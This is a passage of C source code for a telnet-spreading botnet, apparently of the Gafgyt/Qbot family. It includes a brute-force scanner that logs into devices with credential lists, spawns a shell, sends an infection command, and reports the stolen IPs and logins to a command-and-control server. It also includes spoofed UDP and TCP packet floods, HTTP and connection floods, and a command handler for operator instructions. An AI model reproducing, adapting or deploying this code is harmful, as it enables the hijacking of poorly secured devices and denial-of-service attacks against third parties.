0;\n getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);\n if(valopt)\n {\n sclose(fds[i].fd);\n fds[i].state = 0;\n fds[i].complete = 1;\n } else {\n fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));\n fds[i].totalTimeout = 0;\n fds[i].bufUsed = 0;\n memset(fds[i].sockbuf, 0, 1024);\n fds[i].state = 2;\n continue;\n }\n } else if(res == -1)\n {\n sclose(fds[i].fd);\n fds[i].state = 0;\n fds[i].complete = 1;\n }\n\n if(fds[i].totalTimeout + 5 < time(NULL)) //was if(fds[i].totalTimeout + 5 < time(NULL))\n {\n sclose(fds[i].fd);\n fds[i].state = 0;\n fds[i].complete = 1;\n }\n }\n break;\n\n case 2:\n {\n if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);\n\t\t\t\t\tif(matchPrompt(fds[i].sockbuf)) {\n \t\t\tfds[i].state = 7;\n \t\t\t}\n\n if(readUntil(fds[i].fd, \"ogin:\", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))\n {\n fds[i].totalTimeout = 0;\n fds[i].bufUsed = 0;\n memset(fds[i].sockbuf, 0, 1024);\n fds[i].state = 3;\n continue;\n } else {\n fds[i].bufUsed = strlen(fds[i].sockbuf);\n }\n\n if(fds[i].totalTimeout + 30 < time(NULL))\n {\n sclose(fds[i].fd);\n fds[i].state = 0;\n fds[i].complete = 1;\n }\n }\n break;\n\n case 3:\n {\n if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }\n if(send(fds[i].fd, \"\\r\\n\", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }\n fds[i].state = 4;\n }\n break;\n\n case 4:\n {\n if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);\n\n if(readUntil(fds[i].fd, \"assword:\", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))\n {\n fds[i].totalTimeout = 0;\n fds[i].bufUsed = 0;\n if(strstr(fds[i].sockbuf, \"assword:\") != NULL) fds[i].state = 5;\n else fds[i].state = 7;\n memset(fds[i].sockbuf, 0, 1024);\n continue;\n } else {\n if(strstr(fds[i].sockbuf, \"ncorrect\") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }\n fds[i].bufUsed = strlen(fds[i].sockbuf);\n }\n\n if(fds[i].totalTimeout + 8 < time(NULL)) //was if(fds[i].totalTimeout + 8 < time(NULL))\n {\n sclose(fds[i].fd);\n fds[i].state = 0;\n fds[i].complete = 1;\n }\n }\n break;\n\n case 5:\n {\n if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }\n if(send(fds[i].fd, \"\\r\\n\", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }\n fds[i].state = 6;\n }\n break;\n\n case 6:\n {\n if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);\n\n if(readUntil(fds[i].fd, \"ncorrect\", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))\n {\n fds[i].totalTimeout = 0;\n fds[i].bufUsed = 0;\n if(strstr(fds[i].sockbuf, \"ncorrect\") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }\n if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }\n else fds[i].state = 7;\n memset(fds[i].sockbuf, 0, 1024);\n continue;\n } else {\n fds[i].bufUsed = strlen(fds[i].sockbuf);\n }\n\n if(fds[i].totalTimeout + 30 < time(NULL))\n {\n sclose(fds[i].fd);\n fds[i].state = 0;\n fds[i].complete = 1;\n }\n }\n break;\n\n\t\t\tcase 7:\n\t\t\t\t{\n\t\t\t\t\tif(send(fds[i].fd, \"sh\\r\\n\", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }\n\t\t\t\t\tfds[i].state = 8;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t\n\t\t\tcase 8:\n\t\t\t\t{\n\t\t\t\t\tif(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);\n \n\t\t\t\t\tif(send(fds[i].fd, infectline, strlen(infectline), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; memset(fds[i].sockbuf, 0, 1024); continue; }\n sockprintf(mainCommSock, \"REPORT %s:%s:%s\", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);\n\t\t\t\t\t\n\t\t\t\t\tif(fds[i].totalTimeout + 8 < time(NULL))\n\t\t\t\t\t{\n\t\t\t\t\t\tsclose(fds[i].fd);\n\t\t\t\t\t\tfds[i].state = 0;\n\t\t\t\t\t\tfds[i].complete = 1;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n}\n\nvoid sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval)\n{\n struct sockaddr_in dest_addr;\n\n dest_addr.sin_family = AF_INET;\n if(port == 0) dest_addr.sin_port = rand_cmwc();\n else dest_addr.sin_port = htons(port);\n if(getHost(target, &dest_addr.sin_addr)) return;\n memset(dest_addr.sin_zero, '\\0', sizeof dest_addr.sin_zero);\n\n register unsigned int pollRegister;\n pollRegister = pollinterval;\n\n if(spoofit == 32)\n {\n int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n if(!sockfd)\n {\n sockprintf(mainCommSock, \"Failed opening raw socket.\");\n return;\n }\n\n unsigned char *buf = (unsigned char *)malloc(packetsize + 1);\n if(buf == NULL) return;\n memset(buf, 0, packetsize + 1);\n makeRandomStr(buf, packetsize);\n\n int end = time(NULL) + timeEnd;\n register unsigned int i = 0;\n while(1)\n {\n sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));\n\n if(i == pollRegister)\n {\n if(port == 0) dest_addr.sin_port = rand_cmwc();\n if(time(NULL) > end) break;\n i = 0;\n continue;\n }\n i++;\n }\n } else {\n int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);\n if(!sockfd)\n {\n sockprintf(mainCommSock, \"Failed opening raw socket.\");\n \t//sockprintf(mainCommSock, \"REPORT %s:%s:%s\", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);\n return;\n }\n\n int tmp = 1;\n if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)\n {\n sockprintf(mainCommSock, \"Failed setting raw headers mode.\");\n return;\n }\n\n int counter = 50;\n while(counter--)\n {\n srand(time(NULL) ^ rand_cmwc());\n init_rand(rand());\n }\n\n in_addr_t netmask;\n\n if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );\n else netmask = ( ~((1 << (32 - spoofit)) - 1) );\n\n unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];\n struct iphdr *iph = (struct iphdr *)packet;\n struct udphdr *udph = (void *)iph + sizeof(struct iphdr);\n\n makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);\n\n udph->len = htons(sizeof(struct udphdr) + packetsize);\n udph->source = rand_cmwc();\n udph->dest = (port == 0 ? rand_cmwc() : htons(port));\n udph->check = 0;\n\n makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);\n\n iph->check = csum ((unsigned short *) packet, iph->tot_len);\n\n int end = time(NULL) + timeEnd;\n register unsigned int i = 0;\n while(1)\n {\n sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));\n\n udph->source = rand_cmwc();\n udph->dest = (port == 0 ? rand_cmwc() : htons(port));\n iph->id = rand_cmwc();\n iph->saddr = htonl( getRandomIP(netmask) );\n iph->check = csum ((unsigned short *) packet, iph->tot_len);\n\n if(i == pollRegister)\n {\n if(time(NULL) > end) break;\n i = 0;\n continue;\n }\n i++;\n }\n }\n}\n\n//CNC Botnet Flood\nvoid sendCNC(unsigned char *ip,int port, int end_time)\n{\n\tint end = time(NULL) + end_time;\n\tint sockfd;\n\tstruct sockaddr_in server;\n\t//sockfd = socket(AF_INET, SOCK_STREAM, 0);\n\t\n\tserver.sin_addr.s_addr = inet_addr(ip);\n server.sin_family = AF_INET;\n server.sin_port = htons(port);\n\t\n\twhile(end > time(NULL))\n\t{\n\t\tsockfd = socket(AF_INET, SOCK_STREAM, 0);\n\t\tconnect(sockfd , (struct sockaddr *)&server , sizeof(server));\n\t\tsleep(1);\n\t\tclose(sockfd);\n\t}\n\t\n}\n\nvoid sendHTTP(unsigned char *url, int end_time)\n{\n\tint end = time(NULL) + end_time;\n\tFILE *pf;\n char command[80];\n sprintf(command, \"wget --no-check-certificate -q -O /tmp/null \");\n\tstrcat(command, url);\n\t\n pf = popen(command,\"r\");\n\t\n\twhile(end > time(NULL))\n\t{\n\t\tsystem(command);\n\t}\n\t\n}\n\nvoid sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)\n{\n register unsigned int pollRegister;\n pollRegister = pollinterval;\n\n struct sockaddr_in dest_addr;\n\n dest_addr.sin_family = AF_INET;\n if(port == 0) dest_addr.sin_port = rand_cmwc();\n else dest_addr.sin_port = htons(port);\n if(getHost(target, &dest_addr.sin_addr)) return;\n memset(dest_addr.sin_zero, '\\0', sizeof dest_addr.sin_zero);\n\n int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);\n if(!sockfd)\n {\n sockprintf(mainCommSock, \"Failed opening raw socket.\");\n return;\n }\n\n int tmp = 1;\n if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)\n {\n sockprintf(mainCommSock, \"Failed setting raw headers mode.\");\n return;\n }\n\n in_addr_t netmask;\n\n if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );\n else netmask = ( ~((1 << (32 - spoofit)) - 1) );\n\n unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];\n struct iphdr *iph = (struct iphdr *)packet;\n struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);\n\n makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);\n\n tcph->source = rand_cmwc();\n tcph->seq = rand_cmwc();\n tcph->ack_seq = 0;\n tcph->doff = 5;\n\n if(!strcmp(flags, \"all\"))\n {\n tcph->syn = 1;\n tcph->rst = 1;\n tcph->fin = 1;\n tcph->ack = 1;\n tcph->psh = 1;\n } else {\n unsigned char *pch = strtok(flags, \",\");\n while(pch)\n {\n if(!strcmp(pch, \"syn\"))\n {\n tcph->syn = 1;\n } else if(!strcmp(pch, \"rst\"))\n {\n tcph->rst = 1;\n } else if(!strcmp(pch, \"fin\"))\n {\n tcph->fin = 1;\n } else if(!strcmp(pch, \"ack\"))\n {\n tcph->ack = 1;\n } else if(!strcmp(pch, \"psh\"))\n {\n tcph->psh = 1;\n } else {\n sockprintf(mainCommSock, \"Invalid flag \\\"%s\\\"\", pch);\n }\n pch = strtok(NULL, \",\");\n }\n }\n\n tcph->window = rand_cmwc();\n tcph->check = 0;\n tcph->urg_ptr = 0;\n tcph->dest = (port == 0 ? rand_cmwc() : htons(port));\n tcph->check = tcpcsum(iph, tcph);\n\n iph->check = csum ((unsigned short *) packet, iph->tot_len);\n\n int end = time(NULL) + timeEnd;\n register unsigned int i = 0;\n while(1)\n {\n sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));\n\n iph->saddr = htonl( getRandomIP(netmask) );\n iph->id = rand_cmwc();\n tcph->seq = rand_cmwc();\n tcph->source = rand_cmwc();\n tcph->check = 0;\n tcph->check = tcpcsum(iph, tcph);\n iph->check = csum ((unsigned short *) packet, iph->tot_len);\n\n if(i == pollRegister)\n {\n if(time(NULL) > end) break;\n i = 0;\n continue;\n }\n i++;\n }\n}\n\nvoid sendJUNK(unsigned char *ip, int port, int end_time)\n{\n\n int max = getdtablesize() / 2, i;\n\n struct sockaddr_in dest_addr;\n dest_addr.sin_family = AF_INET;\n dest_addr.sin_port = htons(port);\n if(getHost(ip, &dest_addr.sin_addr)) return;\n memset(dest_addr.sin_zero, '\\0', sizeof dest_addr.sin_zero);\n\n struct state_t\n {\n int fd;\n uint8_t state;\n } fds[max];\n memset(fds, 0, max * (sizeof(int) + 1));\n\n fd_set myset;\n struct timeval tv;\n socklen_t lon;\n int valopt, res;\n\n unsigned char *watwat = malloc(1024);\n memset(watwat, 0, 1024);\n\n int end = time(NULL) + end_time;\n while(end > time(NULL))\n {\n for(i = 0; i < max; i++)\n {\n switch(fds[i].state)\n {\n case 0:\n {\n fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);\n fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);\n if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);\n else fds[i].state = 1;\n }\n break;\n\n case 1:\n {\n FD_ZERO(&myset);\n FD_SET(fds[i].fd, &myset);\n tv.tv_sec = 0;\n tv.tv_usec = 10000;\n res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);\n if(res == 1)\n {\n lon = sizeof(int);\n getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);\n if(valopt)\n {\n close(fds[i].fd);\n fds[i].state = 0;\n } else {\n fds[i].state = 2;\n }\n } else if(res == -1)\n {\n close(fds[i].fd);\n fds[i].state = 0;\n }\n }\n break;\n\n case 2:\n {\n makeRandomStr(watwat, 1024);\n if(send(fds[i].fd, watwat, 1024, MSG_NOSIGNAL) == -1 && errno != EAGAIN)\n {\n close(fds[i].fd);\n fds[i].state = 0;\n }\n }\n break;\n }\n }\n }\n}\n\nvoid sendHOLD(unsigned char *ip, int port, int end_time)\n{\n\n int max = getdtablesize() / 2, i;\n\n struct sockaddr_in dest_addr;\n dest_addr.sin_family = AF_INET;\n dest_addr.sin_port = htons(port);\n if(getHost(ip, &dest_addr.sin_addr)) return;\n memset(dest_addr.sin_zero, '\\0', sizeof dest_addr.sin_zero);\n\n struct state_t\n {\n int fd;\n uint8_t state;\n } fds[max];\n memset(fds, 0, max * (sizeof(int) + 1));\n\n fd_set myset;\n struct timeval tv;\n socklen_t lon;\n int valopt, res;\n\n unsigned char *watwat = malloc(1024);\n memset(watwat, 0, 1024);\n\n int end = time(NULL) + end_time;\n while(end > time(NULL))\n {\n for(i = 0; i < max; i++)\n {\n switch(fds[i].state)\n {\n case 0:\n {\n fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);\n fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);\n if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);\n else fds[i].state = 1;\n }\n break;\n\n case 1:\n {\n FD_ZERO(&myset);\n FD_SET(fds[i].fd, &myset);\n tv.tv_sec = 0;\n tv.tv_usec = 10000;\n res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);\n if(res == 1)\n {\n lon = sizeof(int);\n getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);\n if(valopt)\n {\n close(fds[i].fd);\n fds[i].state = 0;\n } else {\n fds[i].state = 2;\n }\n } else if(res == -1)\n {\n close(fds[i].fd);\n fds[i].state = 0;\n }\n }\n break;\n\n case 2:\n {\n FD_ZERO(&myset);\n FD_SET(fds[i].fd, &myset);\n tv.tv_sec = 0;\n tv.tv_usec = 10000;\n res = select(fds[i].fd+1, NULL, NULL, &myset, &tv);\n if(res != 0)\n {\n close(fds[i].fd);\n fds[i].state = 0;\n }\n }\n break;\n }\n }\n }\n}\n\nvoid processCmd(int argc, unsigned char *argv[])\n{\n\tint x;\n if(!strcmp(argv[0], \"PING\"))\n {\n sockprintf(mainCommSock, \"PONG!\");\n return;\n }\n\n if(!strcmp(argv[0], \"GETLOCALIP\"))\n {\n sockprintf(mainCommSock, \"My IP: %s\", inet_ntoa(ourIP));\n return;\n }\n\n if(!strcmp(argv[0], \"SCANNER\"))\n {\n if(argc != 2)\n {\n sockprintf(mainCommSock, \"SCANNER ON | OFF\");\n return;\n }\n\n if(!strcmp(argv[1], \"OFF\"))\n {\n if(scanPid == 0) return;\n kill(scanPid, 9);\n\t\t\t\t\t\tsockprintf(mainCommSock, \"REMOVING PROBE\");\n scanPid = 0;\n }\n\n if(!strcmp(argv[1], \"ON\"))\n {\n if(scanPid != 0) return;\n uint32_t parent;\n parent = fork();\n\t\t\t\t\t\t\n if (parent > 0) { scanPid = parent; return;}\n else if(parent == -1) return;\nsockprintf(mainCommSock, \"PROBING\");\n StartTheLelz();\n _exit(0);\n }\n }\n\t\n if(!strcmp(argv[0], \"HOLD\"))\n {\n if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)\n {\n //sockprintf(mainCommSock, \"HOLD